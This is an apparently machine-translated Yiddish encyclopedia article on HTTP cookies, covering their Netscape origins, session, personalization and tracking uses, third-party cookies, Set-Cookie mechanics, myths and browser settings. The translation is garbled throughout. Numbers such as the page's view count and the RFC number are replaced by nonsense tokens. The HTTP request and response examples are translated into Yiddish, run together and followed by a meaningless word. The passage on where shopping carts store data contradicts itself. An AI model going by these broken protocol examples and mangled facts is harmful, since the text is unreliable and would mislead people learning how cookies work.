in זוך, וויקי

אינטערנעט קיכל: וואָס איז עס? דעפֿיניציע, אָריגינס, טייפּס און פּריוואַטקייט

וואָס איז די ראָלע פון ​​אַ קיכל, וואָס איז עס און וואָס זענען די טייפּס פון קיכלעך? 🍪

קסנומקסק קוקן 384 וואָטעס

אינטערנעט קיכל: וואָס איז עס? דעפֿיניציע, אָריגינס, טייפּס און פּריוואַטקייט
אינטערנעט קיכל: וואָס איז עס? דעפֿיניציע, אָריגינס, טייפּס און פּריוואַטקייט

Un קיכל אָדער וועב קיכל (אָדער קיכל, אַבריוויייטיד ווי יידעס אין קוועבעק) איז דיפיינד דורך די הטטפּ קאָמוניקאַציע פּראָטאָקאָל ווי אַ סיקוואַנס פון אינפֿאָרמאַציע געשיקט דורך אַ הטטפּ סערווער צו אַ הטטפּ קליענט, וואָס דער יענער קערט יעדער מאָל דער זעלביקער הטטפּ סערווער איז קוועריד אונטער זיכער טנאָים.

די קיכל איז דער עקוויוואַלענט פון אַ קליין טעקסט טעקע סטאָרד אויף די וואָקזאַל פון די אינטערנעט באַניצער. עקסיסטינג פֿאַר מער ווי 20 יאָר, זיי לאָזן וועבזייטל דעוועלאָפּערס צו קראָם באַניצער דאַטן אין סדר צו פאַסילאַטייט זייער נאַוויגאַציע און לאָזן זיכער פאַנגקשאַנאַליטי. קיכלעך האָבן שטענדיק געווען מער אָדער ווייניקער קאָנטראָווערסיאַל ווייַל זיי אַנטהאַלטן ריזידזשואַל פערזענלעכע אינפֿאָרמאַציע וואָס קענען פּאַטענטשאַלי זיין עקספּלויטאַד דורך דריט פּאַרטיעס.

עס איז געשיקט ווי אַ הטטפּ כעדער דורך די וועב סערווער צו די וועב בלעטערער וואָס קערט עס אַנטשיינדזשד יעדער מאָל עס אַקסעס די סערווער. א קיכל קענען זיין געוויינט צו אַן אָטענטאַקיישאַן, אַ סעסיע (שטאַט וישאַלט), און פֿאַר קראָם ספּעציפיש אינפֿאָרמאַציע וועגן דעם באַניצער, אַזאַ ווי פּלאַץ פּרעפֿערענצן אָדער די אינהאַלט פון אַן עלעקטראָניש שאַפּינג וואָגן. דער טערמין קיכל איז דערייווד פון מאַגיש קיכל, אַ באַוווסט באַגריף אין יוניקס קאַמפּיוטינג, וואָס ינספּייערד די געדאַנק און נאָמען פון בלעטערער קיכלעך. עס זענען עטלעכע אַלטערנאַטיוועס צו קיכלעך, יעדער מיט זייער אייגענע ניצט, אַדוואַנטידזשיז און דיסאַדוואַנטידזשיז.

ווייל פּשוט טעקסט טעקעס, קיכלעך זענען נישט עקסעקוטאַבלע. זיי זענען נישט ניט ספּיוואַרע אדער ווירוסעס, כאָטש קיכלעך פון עטלעכע זייטלעך זענען דיטעקטאַד דורך פילע אַנטי-ווירוס ווייכווארג ווייַל זיי לאָזן ניצערס צו זיין טראַקט ווען זיי באַזוכן קייפל זייטלעך. 

רובֿ מאָדערן בראַוזערז לאָזן ניצערס צו באַשליסן צי צו אָננעמען אָדער אָפּוואַרפן קיכלעך. יוזערז קענען אויך קלייַבן ווי לאַנג קיכלעך זענען סטאָרד. אָבער, די גאַנץ רידזשעקשאַן פון קיכלעך מאכט עטלעכע זייטלעך אַניוזאַבאַל. פֿאַר בייַשפּיל, קראָם שאַפּינג קאַרץ אָדער זייטלעך וואָס דאַרפן לאָגין ניצן קראַדענטשאַלז (באַניצער נאָמען און פּאַראָל).

טיש פון אינהאַלט

היסטארישע

דער טערמין קיכל דערייווז פון די ענגליש טערמין מאַגיש קיכל, וואָס איז אַ פּאַקאַט פון דאַטן וואָס אַ פּראָגראַם באקומט און קערט אַנטשיינדזשד. קיכלעך זענען שוין געניצט אין עס ווען לו מאָנטוללי האט דער געדאַנק צו נוצן זיי אין וועב קאָמוניקאַציע אין יוני 1994. ער איז דעמאלט געווען אנגעשטעלט ביי נעטסקייפ קאמיוניקאציעס, וואס האט אנטוויקלט אן אי-האנדלס אפליקאציע פאר א קליענט. קיכלעך געגעבן אַ לייזונג צו די פּראָבלעם פון די רילייאַבילאַטי פון די ימפּלאַמענטיישאַן פון אַ קראָם ס ווירטואַל שאַפּינג וואָגן.

John Giannandrea און Lou Montulli געשריבן Netscape ס ערשטער קיכל באַשרייַבונג אין דעם זעלבן יאָר. ווערסיע 0.9 ביתא פון Mosaic Netscape, באפרייט אויף 13 אקטאבער 1994, ינאַגרייטיד קיכל טעכנאָלאָגיע (זען פּאָסטן). דער ערשטער (ניט-עקספּערימענטאַל) נוצן פון קיכלעך איז געווען צו באַשליסן צי וויזאַטערז צו די Netscape וועבזייטל האָבן באזוכט דעם פּלאַץ פריער. מאָנטוללי האָט אָנגעקלאָגט אַ פּאַטענט אַפּלאַקיישאַן פֿאַר קיכל טעכנאָלאָגיע אין 1995, און יו. עס. פּאַטענט 5774670 איז געגעבן. געגעבן אין 1998.

נאָך ימפּלאַמענאַד אין Netscape 0.9 ביתא אין 1994, קיכלעך זענען ינאַגרייטיד אין Internet Explorer 2, באפרייט אין אקטאבער 1995.

די הקדמה פון קיכלעך איז נאָך נישט וויידלי באקאנט צו דעם ציבור. אין באַזונדער, קיכלעך זענען אנגענומען דורך פעליקייַט אין בלעטערער סעטטינגס, און יוזערז זענען נישט ינפאָרמד וועגן זייער בייַזייַן. עטלעכע מענטשן זענען געווען אַווער פון די עקזיסטענץ פון קיכלעך אַרום דער ערשטער פערטל פון 1995, אָבער דער אַלגעמיין ציבור נאָר גענומען צו זייער עקזיסטענץ נאָך די פינאַנסיאַל טיימס פארעפנטלעכט אַן אַרטיקל אויף פעברואר 12, 1996. אין די זעלבע יאָר, קיכלעך באקומען אַ פּלאַץ פון מידיאַ ופמערקזאַמקייט ווייַל פון מעגלעך פּריוואַטקייט ינטרוזשאַנז. די טעמע פון ​​קיכלעך איז דיסקאַסט אין צוויי קאַנסאַלטיישאַנז פון די אמעריקאנער פעדעראלע האנדעל קאַמישאַן אין 1996 און 1997.

די אַנטוויקלונג פון דער באַאַמטער קיכל באַשרייַבונג איז שוין אַנדערוויי. די ערשטע דיסקוסיעס פון דער באַאַמטער ספּעסאַפאַקיישאַן איז פארגעקומען אין אפריל 1995 אויף די www-talk מיילינג רשימה. א ספעציעלע IETF אַרבעט גרופּע איז געגרינדעט. צוויי אָלטערנאַטיוו פּראַפּאָוזאַלז פֿאַר ינטראָודוסינג שטאַט צו הטטפּ טראַנזאַקשאַנז זענען פארגעלייגט דורך Brian Behlendorf און David Kristol ריספּעקטיוולי, אָבער די גרופּע, געפירט דורך Kristol זיך, באַשלאָסן צו נוצן Netscape ס באַשרייַבונג ווי אַ סטאַרטינג פונט. אין פעברואר 1996, די אַרבעט גרופּע באשלאסן אַז דריט פּאַרטיי קיכלעך זענען אַ באַטייטיק סאַקאָנע צו פּריוואַטקייט. די באַשרייַבונג געשאפן דורך די גרופּע איז יווענטשאַוואַלי ארויס ווי רפק קסנומקס.

פון די סוף פון 2014, מיר זען אַ פאָן וועגן קיכלעך אויף פילע זייטלעך. עס איז לפּחות איין בלעטערער פאַרלענגערונג וואָס אַלאַוז די פאָן ניט געוויזן.

טייפּס פון קיכלעך און ניצט

סעסיע פאַרוואַלטונג

קאָאָקיעס קענען זיין געוויינט צו האַלטן באַניצער דאַטן בעשאַס נאַוויגאַציע, אָבער אויך פֿאַר קייפל וויזיץ. קיכלעך זענען באַקענענ צו צושטעלן אַ מיטל פון ימפּלאַמענינג עלעקטראָניש שאַפּינג קאַרץ, אַ ווירטואַל מיטל אין וואָס דער באַניצער קענען אָנקלייַבן די זאכן ער וויל צו קויפן בשעת בראַוזינג די פּלאַץ.

די טעג, אַפּפּס ווי שאַפּינג קאַרץ אַנשטאָט קראָם די רשימה פון זאכן אין אַ דאַטאַבייס אויף אַ סערווער, וואָס איז בילכער; ווי שפּאָרן זיי אין די קיכל זיך. דער וועב סערווער סענדז אַ קיכל מיט אַ יינציק סעסיע שייַן. דער וועב בלעטערער קערט דעם סעסיע שייַן אויף יעדער סאַבסאַקוואַנט בעטן און די ייטאַמז אין די קאָרב זענען געראטעוועט און פֿאַרבונדן מיט דער זעלביקער יינציק סעסיע שייַן.

אָפט נוצן פון קיכלעך איז נוציק פֿאַר לאָגינג אין אַ פּלאַץ ניצן קראַדענטשאַלז. אין קורץ, דער וועב סערווער ערשטער סענדז אַ קיכל מיט אַ יינציק סעסיע שייַן. דערנאָך ניצערס צושטעלן זייער קראַדענטשאַלז (יוזשאַוואַלי אַ נאמען און פּאַראָל). דער וועב אַפּלאַקיישאַן אָטענטאַקייץ די סעסיע און אַלאַוז דער באַניצער צו אַקסעס די סערוויס.

פּערסאַנאַלאַזיישאַן

קאָאָקיעס קענען ווערן גענוצט צו געדענקען אינפֿאָרמאַציע וועגן דעם באַניצער פון אַ פּלאַץ, אין סדר צו ווייַזן אים צונעמען אינהאַלט אין דער צוקונפֿט. צום ביישפּיל, אַ וועב סערווער קענען שיקן אַ קיכל מיט די לעצטע נאמען וואָס איז געניצט צו אַרייַנלאָגירן צו דעם וועבזייטל, אַזוי אַז באַניצער נאָמען קענען זיין פאַר-פּאַפּיאַלייטיד אין צוקונפֿט וויזיץ.

פילע וועבסיטעס נוצן קיכלעך פֿאַר פּערסאַנאַלאַזיישאַן באזירט אויף באַניצער פּרעפֿערענצן. יוזערז אויסקלייַבן זייער פּרעפֿערענצן אין אַ פאָרעם און פאָרלייגן זיי צו די סערווער. דער סערווער ענקאָוד די פּרעפֿערענצן אין אַ קיכל און סענדז עס צוריק צו דעם בלעטערער. דערנאָך, יעדער מאָל ווען דער באַניצער אַקסעס אַ בלאַט פון דעם פּלאַץ, דער בלעטערער קערט די קיכל און דעריבער די רשימה פון פּרעפֿערענצן; דער סערווער קענען דעריבער קאַסטאַמייז די בלאַט לויט די באַניצער 'ס פּרעפֿערענצן. פֿאַר בייַשפּיל, די וויקיפּעדיע וועבזייטל אַלאַוז זייַן ניצערס צו קלייַבן די הויט פון די פּלאַץ זיי בעסער וועלן. דער Google זוך מאָטאָר אַלאַוז זייַן ניצערס (אפילו אויב זיי זענען נישט רעגיסטרירט) צו קלייַבן די נומער פון רעזולטאַטן זיי ווילן צו זען אויף יעדער רעזולטאַטן בלאַט.

טראַקינג

טראַקינג קיכלעך זענען געניצט צו שפּור די בראַוזינג געוווינהייטן פון אינטערנעט ניצערס. דאָס קען אויך זיין טיילווייז דורכגעקאָכט דורך ניצן די IP אַדרעס פון די קאָמפּיוטער וואָס מאַכן אַ בקשה פֿאַר אַ בלאַט אָדער דורך ניצן די 'רעפערער' הטטפּ כעדער וואָס דער קליענט סענדז מיט יעדער בקשה, אָבער קיכלעך לאָזן אַ גרעסערע פּינטלעכקייַט. דאָס קען זיין געטאן ווי אין די פאלגענדע בייַשפּיל:

  1. אויב דער באַניצער רופט אַרויף אַ בלאַט אויף אַ פּלאַץ, און די בקשה טוט נישט אַנטהאַלטן אַ קיכל, דער סערווער אַסומז אַז דאָס איז דער ערשטער בלאַט וואָס דער באַניצער באזוכט. דער סערווער דעמאָלט קריייץ אַ טראַפ שטריקל און סענדז עס צו דעם בלעטערער צוזאמען מיט די געבעטן בלאַט.
  2. פֿון דעם מאָמענט, די קיכל וועט זיין אויטאָמאַטיש געשיקט דורך דעם בלעטערער יעדער מאָל ווען אַ נייַע בלאַט פון דעם פּלאַץ איז גערופֿן. דער סערווער וועט שיקן דעם בלאַט ווי געוויינטלעך, אָבער וועט אויך קלאָץ די URL פון די גערופֿן בלאַט, די דאַטע, צייט פון די בעטן און די קיכל אין אַ קלאָץ טעקע.

דורך קוקן אין די קלאָץ טעקע, עס איז מעגלעך צו זען וואָס בלעטער דער באַניצער האט באזוכט און אין וואָס סדר. פֿאַר בייַשפּיל, אויב די טעקע כּולל אַ ביסל ריקוועס געמאכט מיט די id=abc קיכל, דאָס קען פעסטשטעלן אַז אַלע די ריקוועס קומען פון דער זעלביקער באַניצער. דער URL געבעטן, די דאַטע און צייט פֿאַרבונדן מיט די ריקוועס לאָזן די באַניצער 'ס בראַוזינג צו זיין טראַקט.

דריט-פּאַרטיי קיכלעך און וועב ביקאַנז, דערקלערט אונטן, אויך געבן טראַקינג אויף פאַרשידענע זייטלעך. איין פּלאַץ טראַקינג איז בכלל געניצט פֿאַר סטאַטיסטיש צוועקן. אין קאַנטראַסט, טראַקינג אַריבער פאַרשידענע זייטלעך ניצן דריט-פּאַרטיי קיכלעך איז בכלל געניצט דורך גאַנצע קאָמפּאַניעס צו פּראָדוצירן אַנאָנימע באַנוצערס פּראָופיילז (וואָס זענען דעמאָלט געניצט צו באַשליסן וואָס אַדס זאָל זיין געוויזן צו דער באַניצער און צו שיקן אים E- מיילז קאָראַספּאַנדינג צו די גאַנצע - SPAM ).

טראַקינג קיכלעך זענען אַ ריזיקירן פון ינוואַזיע פון ​​באַניצער פּריוואַטקייט אָבער זיי קענען זיין לייכט אויסגעמעקט. רובֿ מאָדערן בראַוזערז אַרייַננעמען אַן אָפּציע צו אויטאָמאַטיש ויסמעקן פּערסיסטענט קיכלעך ווען קלאָוזינג די אַפּלאַקיישאַן.

דריט פּאַרטיי קיכלעך

בילדער און אנדערע אַבדזשעקץ קאַנטיינד אין אַ וועב בלאַט קען וווינען אויף סערווערס אַנדערש פון דער איינער וואָס האָסטינג די בלאַט. צו ווייַזן דעם בלאַט, דער בלעטערער דאַונלאָודז אַלע די אַבדזשעקץ. רובֿ וועבסיטעס אַנטהאַלטן אינפֿאָרמאַציע פון ​​פאַרשידענע קוואלן. פֿאַר בייַשפּיל, אויב איר אַרייַן www.example.com אין דיין בלעטערער, ​​​​עס וועט אָפט זיין אַבדזשעקץ אָדער אַדווערטייזמאַנץ אויף טייל פון די בלאַט וואָס קומען פון פאַרשידענע קוואלן, ד"ה פֿון אַ אַנדערש פעלד ווי www.example.com. "ערשטער" פּאַרטיי קיכלעך זענען קיכלעך וואָס זענען באַשטימט דורך די פעלד ליסטעד אין די אַדרעס באַר פון דעם בלעטערער. דריט-פּאַרטיי קיכלעך זענען באַשטימט דורך איינער פון די בלאַט אַבדזשעקץ וואָס קומט פון אַ אַנדערש פעלד.

דורך פעליקייַט, בראַוזערז ווי Mozilla Firefox, Microsoft Internet Explorer און Opera אָננעמען דריט-פּאַרטיי קיכלעך, אָבער יוזערז קענען טוישן די סעטטינגס אין בלעטערער אָפּציעס צו פאַרשפּאַרן זיי. עס איז קיין זיכערהייט ריזיקירן טאָכיק אין דריט-פּאַרטיי קיכלעך וואָס געבן וועב פאַנגקשאַנאַליטי, אָבער זיי זענען אויך געניצט צו שפּור ניצערס. פון פּלאַץ צו פּלאַץ.

מכשירים אַזאַ ווי Ghostery בנימצא פֿאַר אַלע בראַוזערז אַרייַנגערעכנט Google קראָום קענען פאַרשפּאַרן יקסטשיינדזשיז צווישן דריט פּאַרטיעס.

ימפּלעמענטאַטיאָן

א מעגלעך ינטעראַקשאַן צווישן אַ וועב בלעטערער און די סערווער האָסטינג די וועב בלאַט. דער סערווער שיקט אַ קיכל צו דעם בלעטערער און דער בלעטערער סענדז עס צוריק ווען עס רופט אן אנדער בלאַט.
א מעגלעך ינטעראַקשאַן צווישן אַ וועב בלעטערער און די סערווער האָסטינג די וועב בלאַט. דער סערווער שיקט אַ קיכל צו דעם בלעטערער און דער בלעטערער סענדז עס צוריק ווען עס רופט אן אנדער בלאַט.

קיכלעך זענען קליין טיילן פון דאַטן געשיקט דורך די וועב סערווער צו דעם בלעטערער. דער בלעטערער קערט זיי אַנטשיינדזשד צו די סערווער, ינטראָודוסינג שטאַט (זיקאָרן פון פאַרגאַנגענהייט געשעענישן) אין די אַנדערש סטייטלאַס הטטפּ טראַנסאַקטיאָן. אָן קיכלעך, יעדער ריטריוואַל פון אַ וועב בלאַט אָדער אַ קאָמפּאָנענט פון אַ וועב בלאַט איז אַן אפגעזונדערט געשעעניש, ינדיפּענדאַנטלי פון אנדערע ריקוועס געמאכט צו דער זעלביקער פּלאַץ. אין אַדישאַן צו זיין באַשטימט דורך די וועב סערווער, קיכלעך קענען אויך זיין באַשטימט דורך סקריפּטינג שפּראַכן אַזאַ ווי דזשאַוואַסקריפּט, אויב געשטיצט און אָטערייזד דורך דעם בלעטערער.

דער באַאַמטער קיכל באַשרייַבונג סאַגדזשעסץ אַז בראַוזערז זאָל זיין ביכולת צו ראַטעווען און שיקן אַ מינימום נומער פון קיכלעך. ספּאַסיפיקלי, אַ בלעטערער זאָל זיין ביכולת צו קראָם בייַ מינדסטער 300 קיכלעך פון פיר קילאבייט יעדער, און בייַ מינדסטער 20 קיכלעך פֿאַר אַ איין סערווער אָדער פעלד.

לויט צו אָפּטיילונג 3.1 פון רפק קסנומקס, קיכל נעמען זענען פאַל-ינסענסיטיוו.

א קיכל קענען ספּעציפיצירן די דאַטע פון ​​​​זייַן עקספּיירי, אין וואָס פאַל די קיכל וועט זיין אויסגעמעקט אויף דעם טאָג. אויב די קיכל טוט נישט ספּעציפיצירן אַ עקספּיירי דאַטע, די קיכל איז אויסגעמעקט ווי באַלד ווי דער באַניצער פאַרלאָזן זיין בלעטערער. דעריבער, ספּעציפיצירן אַ עקספּעריישאַן טאָג איז אַ וועג צו מאַכן די קיכל בלייַבנ לעבן דורך קייפל סעשאַנז. פֿאַר דעם סיבה, קיכלעך מיט אַ עקספּעריישאַן טאָג זענען געזאגט צו זיין פּערסיסטענט. אַ ביישפּיל אַפּלאַקיישאַן: אַ לאַכאָדימ פּלאַץ קען נוצן פּערסיסטענט קיכלעך צו רעקאָרדירן די זאכן וואָס יוזערז האָבן געשטעלט אין זייער שאַפּינג וואָגן (אין פאַקט, די קיכל קען אָפּשיקן צו אַ פּאָזיציע געראטעוועט אין אַ דאַטאַבייס אויף דעם פּלאַץ פון פאַרקויף און נישט אויף דיין קאָמפּיוטער) . דורך דעם מיטל, אויב יוזערז לאָזן זייער בלעטערער אָן קויפן און צוריקקומען צו אים שפּעטער, זיי וועלן קענען צו געפֿינען די זאכן אין די וואָגן ווידער. אויב די קיכלעך האָבן נישט געבן אַ עקספּעריישאַן טאָג, זיי וואָלט ויסגיין ווען דער בלעטערער איז געווען פארמאכט, און די אינפֿאָרמאַציע וועגן די אינהאַלט פון די קאָרב וואָלט זיין פאַרפאַלן.

קיכלעך קענען זיין לימיטעד אין פאַרנעם צו אַ ספּעציפיש פעלד, סובדאָמאַין אָדער דרך אויף די סערווער וואָס באשאפן זיי.

די אַריבערפירן פון וועב זייַטלעך איז דורכגעקאָכט מיט די HyperText Transfer Protocol (HTTP). דורך איגנאָרירן קיכלעך, בראַוזערז רופן אַ בלאַט פֿון וועב סערווערס דורך בכלל שיקן זיי אַ קורץ טעקסט גערופן הטטפּ בעטן. פֿאַר בייַשפּיל, צו אַקסעס די בלאַט www.example.org/index.html, בראַוזערז פאַרבינדן צו די סערווער www.example.org און שיקן אַ בקשה וואָס קוקט ווי דאָס:

באַקומען / index.html הטטפּ / 1.1 האָסט: www.example.org
נאַוויגאַטאָרסערוועור

דער סערווער ריספּאַנדז דורך שיקן די געבעטן בלאַט, פּריסטיד דורך אַ ענלעך טעקסט, די גאנצע זייַענדיק גערופן הטטפּ ענטפער. דעם פּאַקאַט קען אַנטהאַלטן שורות וואָס לערנען דעם בלעטערער צו קראָם קיכלעך:

הטטפּ/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(HTML בלאַט)
נאַוויגאַטאָרסערוועור

דער סערווער שיקט בלויז די סעט-קיכל שורה, אויב דער סערווער וויל אַז דער בלעטערער זאָל קראָם אַ קיכל. Set-Cookie איז אַ בקשה פֿאַר דעם בלעטערער צו קראָם די נאָמען = ווערט שטריקל און צוריקקומען עס אין אַלע צוקונפֿט ריקוועס צו די סערווער. אויב דער בלעטערער שטיצט קיכלעך און קיכלעך זענען ענייבאַלד אין די בלעטערער אָפּציעס, די קיכל וועט זיין אַרייַנגערעכנט אין אַלע סאַבסאַקוואַנט ריקוועס געמאכט צו דער זעלביקער סערווער. פֿאַר בייַשפּיל, דער בלעטערער רופט די בלאַט www.example.org/news.html דורך שיקן די פאלגענדע בעטן צו די סערווער www.example.org:

באַקומען / נייַעס.html הטטפּ / 1.1 האָסט: www.example.org קיכל: נאָמען = ווערט אָננעמען: */*
נאַוויגאַטאָרסערוועור

דאָס איז אַ בקשה פֿאַר אן אנדער בלאַט פון די זעלבע סערווער, און איז אַנדערש פון דער ערשטער אויבן ווייַל עס כּולל אַ שטריקל וואָס דער סערווער פריער געשיקט צו דעם בלעטערער. דאַנק צו דעם מיטל, דער סערווער ווייסט אַז די בעטן איז לינגקט צו די פריערדיקע. דער סערווער ריספּאַנדז דורך שיקן די גערופֿן בלאַט, און אויך צו לייגן אנדערע קיכלעך צו אים.

די ווערט פון די קיכל קענען זיין פארענדערט דורך די סערווער דורך שיקן אַ נייַע שורה שטעלן-קיכל: נאָמען = נייַ_וואַליו אין ענטפער צו די גערופֿן בלאַט. דער בלעטערער ריפּלייסיז די אַלט ווערט מיט די נייַע.

די סעט-קיכל שורה איז יוזשאַוואַלי באשאפן דורך אַ CGI פּראָגראַם אָדער אנדערע סקריפּטינג שפּראַך, נישט דורך די הטטפּ סערווער. דער הטטפּ סערווער (בייַשפּיל: אַפּאַטשי) וועט בלויז אַריבערפירן די רעזולטאַט פון די פּראָגראַם (אַ דאָקומענט פּריסטיד דורך די כעדער מיט די קיכלעך) צו דעם בלעטערער.

קאָאָקיעס קענען אויך זיין באַשטימט דורך דזשאַוואַסקריפּט אָדער אנדערע ענלעך שפּראַכן פליסנדיק אין דעם בלעטערער, ​​ד"ה אויף דער קליענט זייַט אלא ווי די סערווער זייַט. אין דזשאַוואַסקריפּט, די document.cookie כייפעץ איז געניצט פֿאַר דעם צוועק. פֿאַר בייַשפּיל, די דערקלערונג document.cookie = "טעמפּעראַטור=20" קריייץ אַ קיכל מיטן נאָמען "טעמפּעראַטור" און מיט אַ ווערט פון 20.

בייַשפּיל פון אַ הטטפּ ענטפער פון google.com, וואָס שטעלט אַ קיכל מיט אַטריביוץ.
בייַשפּיל פון אַ הטטפּ ענטפער פון google.com, וואָס שטעלט אַ קיכל מיט אַטריביוץ.

אין אַדישאַן צו די נאָמען / ווערט פּאָר, אַ קיכל קענען אויך אַנטהאַלטן אַ עקספּיירי דאַטע, אַ דרך, אַ פעלד נאָמען און די טיפּ פון קשר בדעה, ד"ה נאָרמאַל אָדער ינקריפּטיד. RFC 2965 אויך דיפיינז אַז קיכלעך מוזן האָבן אַ מאַנדאַטאָרי ווערסיע נומער, אָבער דאָס איז בכלל איבערגעהיפּערט. די דאַטן טיילן נאָכגיין די נאָמען = נייַ_וואַלוע פּאָר און זענען אפגעשיידט דורך סעמיקאָלאָנס. פֿאַר בייַשפּיל, אַ קיכל קענען זיין באשאפן דורך די סערווער דורך שיקן אַ באַשטעטיק-קיכל שורה: נאָמען = נייַ_וואַליו; יקספּייערז = דאַטע; דרך=/; domain=.example.org.

קיכלעך ויסגיין און זענען נישט געשיקט דורך דעם בלעטערער צו די סערווער אין די פאלגענדע סיטואַטיאָנס:

  • ווען דער בלעטערער איז פארמאכט, אויב די קיכל איז נישט פּערסיסטענט.
  • ווען די עקספּעריישאַן טאָג פון די קיכל איז דורכגעגאנגען.
  • ווען די עקספּעריישאַן טאָג פון די קיכל איז פארענדערט (דורך די סערווער אָדער די שריפט) צו אַ דאַטע אין דער פאַרגאַנגענהייט.
  • ווען דער בלעטערער דיליץ די קיכל אויף דער בקשה פון דער באַניצער.

די דריט סיטואַציע אַלאַוז סערווערס אָדער סקריפּס צו ויסמעקן אַ קיכל. באַמערקונג אַז עס איז מעגלעך מיט די Google קראָום וועב בלעטערער צו וויסן די עקספּעריישאַן טאָג פון אַ באַזונדער קיכל דורך אַקסעס די אינהאַלט סעטטינגס. א קיכל געראטעוועט אויף אַ קאָמפּיוטער קען זייער גוט בלייַבן דאָרט פֿאַר עטלעכע יאָרצענדלינג אויב קיין פּראָצעדור איז גענומען צו מעקן עס.

סטערעאָטיפּעס

זינט זייער הקדמה אויף די אינטערנעט, פילע געדאנקען וועגן קיכלעך האָבן סערקיאַלייטיד אויף די אינטערנעט און אין די מידיאַ. אין 1998, CIAC, אַ קאָמפּיוטער אינצידענט מאָניטאָרינג מאַנשאַפֿט פון די פאַרייניקטע שטאַטן דעפּאַרטמענט פון ענערגיע, באשלאסן אַז קיכל זיכערהייט וואַלנעראַביליטיז זענען "בייסיקלי ניט-עגזיסטאַנט" און דערקלערט אַז "אינפֿאָרמאַציע וועגן די אָנהייב פון דיין וויזיץ און די דעטאַילס פון די וועב זייַטלעך וואָס איר האָט באזוכט. שוין עקסיסטירן אין די קלאָץ טעקעס פון די וועב סערווערס". אין 2005, דזשופּיטער פאָרשונג ארויס די רעזולטאַטן פון אַ לערנען, אין וואָס אַ באַטייטיק פּראָצענט פון ריספּאַנדאַנץ באַטראַכטן די פאלגענדע סטייטמאַנץ:

  • קיכלעך זענען ווי ווירוס, זיי אָנשטעקן די שווער דרייווז פון ניצערס.
  • קיכלעך דזשענערייט קנאַל-אַרויף.
  • קיכלעך זענען געניצט צו שיקן ספּאַם.
  • קיכלעך זענען געניצט בלויז פֿאַר גאַנצע.

קאָאָקיעס קענען נישט מעקן אָדער לייענען אינפֿאָרמאַציע פון ​​די באַניצער 'ס קאָמפּיוטער. אָבער, קיכלעך מאַכן עס מעגלעך צו דעטעקט די וועב זייַטלעך באזוכט דורך אַ באַניצער אויף אַ געגעבן פּלאַץ אָדער שטעלן פון זייטלעך. די אינפֿאָרמאַציע קענען זיין געזאמלט אין אַ באַניצער פּראָפיל וואָס קענען זיין געוויינט אָדער ריסאָולד צו דריט פּאַרטיעס, וואָס קענען אָנמאַכן ערנסט פּריוואַטקייט ישוז. עטלעכע פּראָופיילז זענען אַנאַנאַמאַס, אין דעם זינען אַז זיי אַנטהאַלטן קיין פערזענלעכע אינפֿאָרמאַציע, אָבער אפילו אַזאַ פּראָופיילז קענען זיין פּראָבלעמאַטיש.

לויט דער זעלביקער לערנען, אַ גרויס פּראָצענט פון אינטערנעט ניצערס טאָן ניט וויסן ווי צו ויסמעקן קיכלעך. איינער פון די סיבות וואָס מענטשן טאָן ניט צוטרוי קיכלעך איז אַז עטלעכע זייטלעך האָבן אַביוזד די פּערסאַנאַלי ידענטיפיינג אַספּעקט פון קיכלעך און שערד די אינפֿאָרמאַציע מיט אנדערע קוואלן. א גרויס פּראָצענט פון טאַרגעטעד גאַנצע און אַנסאַליסיטיד בליצפּאָסט, באטראכט ספּאַם, קומט פון אינפֿאָרמאַציע גלעאַנד פֿון טראַקינג קיכלעך.

בלעטערער סעטטינגס

רובֿ בראַוזערז שטיצן קיכלעך און לאָזן די באַניצער צו דיסייבאַל זיי. די מערסט פּראָסט אָפּציעס זענען:

  • געבן אָדער דיסייבאַל קיכלעך גאָר, אַזוי אַז זיי זענען קעסיידער אנגענומען אָדער אפגעשטעלט.
  • לאָזן די באַניצער צו זען די אַקטיוו קיכלעך אין אַ געגעבן בלאַט דורך אַרייַן דזשאַוואַסקריפּט: alert(document.cookie) אין די אַדרעס באַר פון דעם בלעטערער. עטלעכע בראַוזערז ינקאָרפּערייט אַ קיכל פאַרוואַלטער פֿאַר די באַניצער וואָס קענען זען און סאַלעקטיוולי ויסמעקן קיכלעך איצט סטאָרד דורך דעם בלעטערער.

רובֿ בראַוזערז אויך לאָזן פול דילישאַן פון פערזענלעכע דאַטן וואָס כולל קיכלעך. נאָך מאַדזשולז צו קאָנטראָלירן קיכל פּערמישאַנז אויך עקסיסטירן.

פּריוואַטקייט און דריט-פּאַרטיי קיכלעך

אין דעם פיקטישאַס בייַשפּיל, אַ גאַנצע פירמע האט געשטעלט באַנערז אויף צוויי וועבסיטעס. דורך האָסטינג די באַנערז אויף זייַן סערווערס און ניצן דריט פּאַרטיי קיכלעך, די גאַנצע פירמע איז ביכולת צו שפּור די באַניצער ס נאַוויגאַציע דורך די צוויי זייטלעך.

קיכלעך האָבן וויכטיק ימפּלאַקיישאַנז פֿאַר די פּריוואַטקייט און אַנאָנימיטי פון וועב ניצערס. כאָטש קיכלעך זענען בלויז געשיקט צוריק צו די סערווער וואָס שטעלן זיי אָדער צו אַ סערווער וואָס געהערט צו דער זעלביקער אינטערנעט פעלד, אַ וועב בלאַט קען אָבער אַנטהאַלטן בילדער אָדער אנדערע קאַמפּאָונאַנץ סטאָרד אויף סערווערס וואָס געהערן צו אנדערע דאָומיינז. די קיכלעך וואָס זענען באַשטימט בעשאַס די אָפּזוך פון די פונדרויסנדיק קאַמפּאָונאַנץ זענען גערופן דריט פּאַרטיי קיכלעך. דאָס כולל קיכלעך פון אַנוואָנטיד קנאַל-אַרויף פֿענצטער.

גאַנצע קאָמפּאַניעס נוצן דריט-פּאַרטיי קיכלעך צו שפּור ניצערס אַריבער די פאַרשידענע זייטלעך זיי באַזוכן. אין באַזונדער, אַ גאַנצע פירמע קענען שפּור אַ באַניצער אַריבער אַלע בלעטער ווו עס האט געשטעלט גאַנצע בילדער אָדער אַ טראַקינג פּיקסעל. וויסן פון די בלעטער באזוכט דורך דער באַניצער אַלאַוז די גאַנצע פירמע צו ציל די גאַנצע פּרעפֿערענצן פון די באַניצער.

די פיייקייט צו בויען אַ באַניצער פּראָפיל איז באטראכט דורך עטלעכע צו זיין אַ פּריוואַטקייט ינוואַזיע, ספּעציעל ווען טראַקינג איז דורכגעקאָכט אַריבער פאַרשידענע דאָומיינז ניצן דריט פּאַרטיי קיכלעך. פֿאַר דעם סיבה, עטלעכע לענדער האָבן קיכל געסעצ - געבונג.

